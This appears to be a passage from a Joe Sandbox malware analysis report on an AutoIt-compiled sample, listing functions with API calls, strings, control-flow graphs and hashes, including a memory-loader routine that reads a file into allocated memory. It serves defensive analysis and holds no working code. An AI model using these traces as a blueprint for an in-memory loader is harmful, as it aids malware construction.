                                                            • Instruction ID: 81e07ffe4eb9836f42263d185602c9004663e7ce6fe79d4de78e5a7fc2f376f9
                                                            • Opcode Fuzzy Hash: 3fac4f14d5200589a06f2f0027360dbc57721fa9cf091b7df2bf469329a919c0
                                                            • Instruction Fuzzy Hash: 4A3138B1840349AFDB908FE4E988ACDBBF0FB09310F10852AE580E62A1D3B94585CF51
                                                            Function 001A3041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54windowregistryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            • GetSysColorBrush.USER32(0000000F), ref: 001A3074
                                                            • RegisterClassExW.USER32(00000030), ref: 001A309E
                                                            • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 001A30AF
                                                            • InitCommonControlsEx.COMCTL32(?), ref: 001A30CC
                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 001A30DC
                                                            • LoadIconW.USER32(000000A9), ref: 001A30F2
                                                            • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 001A3101
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                            • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                            • API String ID: 2914291525-1005189915
                                                            • Opcode ID: e5f446097bbba57ecda1f405e8cf3b62961ee34f6698b27aaf0dedc64234aedb
                                                            • Instruction ID: e387265725edf8ff8e84b4d83fdbf269697ecbc84caa8293b35164face2ce64c
                                                            • Opcode Fuzzy Hash: e5f446097bbba57ecda1f405e8cf3b62961ee34f6698b27aaf0dedc64234aedb
                                                            • Instruction Fuzzy Hash: A221BFB1950218BFDB50DFE4FA8DB9DBBF4FB08700F10922AFA10A62A0D7B545458F95
                                                            Function 001A71EB Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                              • Part of subcall function 001A4864: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,002662F8,?,001A37C0,?), ref: 001A4882
                                                              • Part of subcall function 001C074F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,001A72C5), ref: 001C0771
                                                            • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 001A7308
                                                            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 001DECF1
                                                            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 001DED32
                                                            • RegCloseKey.ADVAPI32(?), ref: 001DED70
                                                            • _wcscat.LIBCMT ref: 001DEDC9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                            • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                            • API String ID: 2673923337-2727554177
                                                            • Opcode ID: 2005eea4800439b3a6df16c886cfc464b830fef88f585669464f030c151c6267
                                                            • Instruction ID: f791f104e4771e06e45ec9c4470c261e7d749ba25c3b6a7bd68ab64d9337fea7
                                                            • Opcode Fuzzy Hash: 2005eea4800439b3a6df16c886cfc464b830fef88f585669464f030c151c6267
                                                            • Instruction Fuzzy Hash: 687190714183019EC714EF65FC9599BBBF8FFA9704F40452EF845872A0EB709A48CBA2
                                                            Function 001A3633 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 151windowtimeregistryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 760 1a3633-1a3681 762 1a3683-1a3686 760->762 763 1a36e1-1a36e3 760->763 764 1a3688-1a368f 762->764 765 1a36e7 762->765 763->762 766 1a36e5 763->766 770 1a375d-1a3765 PostQuitMessage 764->770 771 1a3695-1a369a 764->771 768 1dd31c-1dd34a call 1b11d0 call 1b11f3 765->768 769 1a36ed-1a36f0 765->769 767 1a36ca-1a36d2 DefWindowProcW 766->767 777 1a36d8-1a36de 767->777 807 1dd34f-1dd356 768->807 772 1a36f2-1a36f3 769->772 773 1a3715-1a373c SetTimer RegisterWindowMessageW 769->773 778 1a3711-1a3713 770->778 774 1dd38f-1dd3a3 call 202a16 771->774 775 1a36a0-1a36a2 771->775 779 1dd2bf-1dd2c2 772->779 780 1a36f9-1a370c KillTimer call 1a44cb call 1a3114 772->780 773->778 781 1a373e-1a3749 CreatePopupMenu 773->781 774->778 801 1dd3a9 774->801 782 1a36a8-1a36ad 775->782 783 1a3767-1a3776 call 1a4531 775->783 778->777 786 1dd2f8-1dd317 MoveWindow 779->786 787 1dd2c4-1dd2c6 779->787 780->778 781->778 789 1dd374-1dd37b 782->789 790 1a36b3-1a36b8 782->790 783->778 786->778 795 1dd2c8-1dd2cb 787->795 796 1dd2e7-1dd2f3 SetFocus 787->796 789->767 798 1dd381-1dd38a call 1f817e 789->798 799 1a374b-1a375b call 1a45df 790->799 800 1a36be-1a36c4 790->800 795->800 803 1dd2d1-1dd2e2 call 1b11d0 795->803 796->778 798->767 799->778 800->767 800->807 801->767 803->778 807->767 808 1dd35c-1dd36f call 1a44cb call 1a43db 807->808 808->767
                                                            APIs
                                                            • DefWindowProcW.USER32(?,?,?,?), ref: 001A36D2
                                                            • KillTimer.USER32(?,00000001), ref: 001A36FC
                                                            • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 001A371F
                                                            • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 001A372A
                                                            • CreatePopupMenu.USER32 ref: 001A373E
                                                            • PostQuitMessage.USER32(00000000), ref: 001A375F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                            • String ID: TaskbarCreated$%#
                                                            • API String ID: 129472671-3931851844
                                                            • Opcode ID: 51770424c511bf2327e4f05d9b4a483bd856b1a2a8ccf798557a98ccc9bd2856
                                                            • Instruction ID: 4b76887df78fb4e3fcbe456fc17f188de57a39958aa985aaae28af860ed52259
                                                            • Opcode Fuzzy Hash: 51770424c511bf2327e4f05d9b4a483bd856b1a2a8ccf798557a98ccc9bd2856
                                                            • Instruction Fuzzy Hash: 39415CF9200205BBDF285FB8FD4DB7A3765EB12300F140239F922962B1CBA49F5597A1
                                                            Function 001A3A58 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71windowregistryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            • GetSysColorBrush.USER32(0000000F), ref: 001A3A62
                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 001A3A71
                                                            • LoadIconW.USER32(00000063), ref: 001A3A88
                                                            • LoadIconW.USER32(000000A4), ref: 001A3A9A
                                                            • LoadIconW.USER32(000000A2), ref: 001A3AAC
                                                            • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 001A3AD2
                                                            • RegisterClassExW.USER32(?), ref: 001A3B28
                                                              • Part of subcall function 001A3041: GetSysColorBrush.USER32(0000000F), ref: 001A3074
                                                              • Part of subcall function 001A3041: RegisterClassExW.USER32(00000030), ref: 001A309E
                                                              • Part of subcall function 001A3041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 001A30AF
                                                              • Part of subcall function 001A3041: InitCommonControlsEx.COMCTL32(?), ref: 001A30CC
                                                              • Part of subcall function 001A3041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 001A30DC
                                                              • Part of subcall function 001A3041: LoadIconW.USER32(000000A9), ref: 001A30F2
                                                              • Part of subcall function 001A3041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 001A3101
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                            • String ID: #$0$AutoIt v3
                                                            • API String ID: 423443420-4155596026
                                                            • Opcode ID: 086fbfdf4f9975bdd6e54c84aa0c175a574a2443bb66f0589b5ad1ec4b9ea325
                                                            • Instruction ID: 72e1d03322e0ad825009f0084ac877b84495867f7c45c2f8a02e16e83dce5e82
                                                            • Opcode Fuzzy Hash: 086fbfdf4f9975bdd6e54c84aa0c175a574a2443bb66f0589b5ad1ec4b9ea325
                                                            • Instruction Fuzzy Hash: 67210671940308FBEB509FA4FD5DB9D7FB5EB08711F00812AF904A62A0D7F656548F94
                                                            Function 001A3778 Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 267COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                                            • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW$b&
                                                            • API String ID: 1825951767-2560068738
                                                            • Opcode ID: f62a1e655cb09d53151212cfd547d418233fc279771166fd682fe03ed9b8c721
                                                            • Instruction ID: 709e0b248885baea49808d20a6c6f2ef9303fe965f68480907b4c84c14813f3a
                                                            • Opcode Fuzzy Hash: f62a1e655cb09d53151212cfd547d418233fc279771166fd682fe03ed9b8c721
                                                            • Instruction Fuzzy Hash: 18A14279D10229AACF04EFE0DC95EEEB778BF26300F54052AF416A7191EF749A45CB60
                                                            Function 001AF8CF Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 168comCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                              • Part of subcall function 001C03A2: MapVirtualKeyW.USER32(0000005B,00000000), ref: 001C03D3
                                                              • Part of subcall function 001C03A2: MapVirtualKeyW.USER32(00000010,00000000), ref: 001C03DB
                                                              • Part of subcall function 001C03A2: MapVirtualKeyW.USER32(000000A0,00000000), ref: 001C03E6
                                                              • Part of subcall function 001C03A2: MapVirtualKeyW.USER32(000000A1,00000000), ref: 001C03F1
                                                              • Part of subcall function 001C03A2: MapVirtualKeyW.USER32(00000011,00000000), ref: 001C03F9
                                                              • Part of subcall function 001C03A2: MapVirtualKeyW.USER32(00000012,00000000), ref: 001C0401
                                                              • Part of subcall function 001B6259: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,001AFA90), ref: 001B62B4
                                                            • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 001AFB2D
                                                            • OleInitialize.OLE32(00000000), ref: 001AFBAA
                                                            • CloseHandle.KERNEL32(00000000), ref: 001E49F2
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                            • String ID: <g&$\d&$%#$c&
                                                            • API String ID: 1986988660-182561653
                                                            • Opcode ID: 4ca00b3e3f557ab7fa4fb3a7de594a9424edac4f91d2c81d01ffbc81688effeb
                                                            • Instruction ID: d68632ed939473c3e0fecb212f2c86ff1f68b69611e97d7f03fd6f554ebbdc3a
                                                            • Opcode Fuzzy Hash: 4ca00b3e3f557ab7fa4fb3a7de594a9424edac4f91d2c81d01ffbc81688effeb
                                                            • Instruction Fuzzy Hash: B181A8B49112809EC3A4DF69F94D625BBF5EBA9708F10C17ED019C7362EBB18465CFA0
                                                            Function 034D25C0 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 983 34d25c0-34d266e call 34d0000 986 34d2675-34d269b call 34d34d0 CreateFileW 983->986 989 34d269d 986->989 990 34d26a2-34d26b2 986->990 991 34d27ed-34d27f1 989->991 998 34d26b9-34d26d3 VirtualAlloc 990->998 999 34d26b4 990->999 992 34d2833-34d2836 991->992 993 34d27f3-34d27f7 991->993 995 34d2839-34d2840 992->995 996 34d27f9-34d27fc 993->996 997 34d2803-34d2807 993->997 1002 34d2895-34d28aa 995->1002 1003 34d2842-34d284d 995->1003 996->997 1004 34d2809-34d2813 997->1004 1005 34d2817-34d281b 997->1005 1000 34d26da-34d26f1 ReadFile 998->1000 1001 34d26d5 998->1001 999->991 1006 34d26f8-34d2738 VirtualAlloc 1000->1006 1007 34d26f3 1000->1007 1001->991 1010 34d28ac-34d28b7 VirtualFree 1002->1010 1011 34d28ba-34d28c2 1002->1011 1008 34d284f 1003->1008 1009 34d2851-34d285d 1003->1009 1004->1005 1012 34d281d-34d2827 1005->1012 1013 34d282b 1005->1013 1014 34d273f-34d275a call 34d3720 1006->1014 1015 34d273a 1006->1015 1007->991 1008->1002 1016 34d285f-34d286f 1009->1016 1017 34d2871-34d287d 1009->1017 1010->1011 1012->1013 1013->992 1023 34d2765-34d276f 1014->1023 1015->991 1019 34d2893 1016->1019 1020 34d287f-34d2888 1017->1020 1021 34d288a-34d2890 1017->1021 1019->995 1020->1019 1021->1019 1024 34d2771-34d27a0 call 34d3720 1023->1024 1025 34d27a2-34d27b6 call 34d3530 1023->1025 1024->1023 1030 34d27b8 1025->1030 1031 34d27ba-34d27be 1025->1031 1030->991 1033 34d27ca-34d27ce 1031->1033 1034 34d27c0-34d27c4 FindCloseChangeNotification 1031->1034 1035 34d27de-34d27e7 1033->1035 1036 34d27d0-34d27db VirtualFree 1033->1036 1034->1033 1035->986 1035->991 1036->1035
                                                            APIs
                                                            • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 034D2691
                                                            • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 034D28B7
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701993742.00000000034D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_34d0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: CreateFileFreeVirtual
                                                            • String ID:
                                                            • API String ID: 204039940-0
                                                            • Opcode ID: ed516440ab75e0c1ded8a7b1870b24392b753ad5cf7d4aa929dd61e32643855c
                                                            • Instruction ID: 571d04a7796085dfc1aa76dd9e30e7641952e1fd3803872d92c554707c2b373c
                                                            • Opcode Fuzzy Hash: ed516440ab75e0c1ded8a7b1870b24392b753ad5cf7d4aa929dd61e32643855c
                                                            • Instruction Fuzzy Hash: D7A10A74E00209EBDB14CFA4C9A4BEEB7B5FF48304F14859AE511BB280D7B59A41CF64
                                                            Function 001A39E7 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1114 1a39e7-1a3a57 CreateWindowExW * 2 ShowWindow * 2
                                                            APIs
                                                            • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 001A3A15
                                                            • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 001A3A36
                                                            • ShowWindow.USER32(00000000,?,?), ref: 001A3A4A
                                                            • ShowWindow.USER32(00000000,?,?), ref: 001A3A53
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Window$CreateShow
                                                            • String ID: AutoIt v3$edit
                                                            • API String ID: 1584632944-3779509399
                                                            • Opcode ID: eda7623189a4a25cff0efdf3b0f7788c35e77dac2be932a7f23212de142f205a
                                                            • Instruction ID: b3ffeb6a55ca73a918eec67abff0267898c5e92a15246d4584600d882980b895
                                                            • Opcode Fuzzy Hash: eda7623189a4a25cff0efdf3b0f7788c35e77dac2be932a7f23212de142f205a
                                                            • Instruction Fuzzy Hash: EAF0D4716412A0BEEB711B67BC5DE676E7DE7C6F50F00813AFD04A21B0C6E61851DAB0
                                                            Function 034D23B0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 138fileCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1115 34d23b0-34d24c0 call 34d0000 call 34d22a0 CreateFileW 1122 34d24c7-34d24d7 1115->1122 1123 34d24c2 1115->1123 1126 34d24de-34d24f8 VirtualAlloc 1122->1126 1127 34d24d9 1122->1127 1124 34d2577-34d257c 1123->1124 1128 34d24fc-34d2513 ReadFile 1126->1128 1129 34d24fa 1126->1129 1127->1124 1130 34d2515 1128->1130 1131 34d2517-34d2551 call 34d22e0 call 34d12a0 1128->1131 1129->1124 1130->1124 1136 34d256d-34d2575 ExitProcess 1131->1136 1137 34d2553-34d2568 call 34d2330 1131->1137 1136->1124 1137->1136
                                                            APIs
                                                              • Part of subcall function 034D22A0: Sleep.KERNELBASE(000001F4), ref: 034D22B1
                                                            • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 034D24B6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701993742.00000000034D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_34d0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: CreateFileSleep
                                                            • String ID: D7B1FIWHH0JCD7RF
                                                            • API String ID: 2694422964-3059270100
                                                            • Opcode ID: 3e2e3d7817fe1b2579be4b7ccdd8c51af18466f4c47a8fbf8ae7ad50f8884792
                                                            • Instruction ID: c050ced9873111af92567225acb073236ede527761651ca932f7192fddd923db
                                                            • Opcode Fuzzy Hash: 3e2e3d7817fe1b2579be4b7ccdd8c51af18466f4c47a8fbf8ae7ad50f8884792
                                                            • Instruction Fuzzy Hash: A0516171D14249EAEF11DBA4C824BEFBB79AF45300F004599E6087B2C0D7B91B45CBA9
                                                            Function 001A410D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88windowCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1139 1a410d-1a4123 1140 1a4129-1a413e call 1a7b76 1139->1140 1141 1a4200-1a4204 1139->1141 1144 1dd5dd-1dd5ec LoadStringW 1140->1144 1145 1a4144-1a4164 call 1a7d2c 1140->1145 1148 1dd5f7-1dd60f call 1a7c8e call 1a7143 1144->1148 1145->1148 1149 1a416a-1a416e 1145->1149 1159 1a417e-1a41fb call 1c3020 call 1a463e call 1c2ffc Shell_NotifyIconW call 1a5a64 1148->1159 1160 1dd615-1dd633 call 1a7e0b call 1a7143 call 1a7e0b 1148->1160 1151 1a4174-1a4179 call 1a7c8e 1149->1151 1152 1a4205-1a420e call 1a81a7 1149->1152 1151->1159 1152->1159 1159->1141 1160->1159
                                                            APIs
                                                            • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 001DD5EC
                                                              • Part of subcall function 001A7D2C: _memmove.LIBCMT ref: 001A7D66
                                                            • _memset.LIBCMT ref: 001A418D
                                                            • _wcscpy.LIBCMT ref: 001A41E1
                                                            • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 001A41F1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                            • String ID: Line:
                                                            • API String ID: 3942752672-1585850449
                                                            • Opcode ID: 76fe28aee6c202273d4ee237a1106ba19b8cf84851b9f450450a02636a1ada55
                                                            • Instruction ID: a46c78af92b20559529dc259a6c667ee44e5e64063a4b93508ac34cc83800328
                                                            • Opcode Fuzzy Hash: 76fe28aee6c202273d4ee237a1106ba19b8cf84851b9f450450a02636a1ada55
                                                            • Instruction Fuzzy Hash: C431E275008304ABD361EB60EC4AFDB77ECAFA6310F10451EF585920E1EBB0A749CB92
                                                            Function 001C564D Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                            • String ID:
                                                            • API String ID: 1559183368-0
                                                            • Opcode ID: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
                                                            • Instruction ID: ccb594a7cfb79168571b634606c64d3739057f299043e8484caec1fa61885a89
                                                            • Opcode Fuzzy Hash: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
                                                            • Instruction Fuzzy Hash: 06518371A00B15DBDB248FA98884F6E77A3AF60324FA4872DF825962D0D770EDD08B50
                                                            Function 001A69CA Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 260COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 001A4F3D: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,002662F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 001A4F6F
                                                            • _free.LIBCMT ref: 001DE68C
                                                            • _free.LIBCMT ref: 001DE6D3
                                                              • Part of subcall function 001A6BEC: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 001A6D0D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: _free$CurrentDirectoryLibraryLoad
                                                            • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                            • API String ID: 2861923089-1757145024
                                                            • Opcode ID: 73657cf6088ea9d55041d29277f676da50fa441a9f4eea237ef45e22c2b4808d
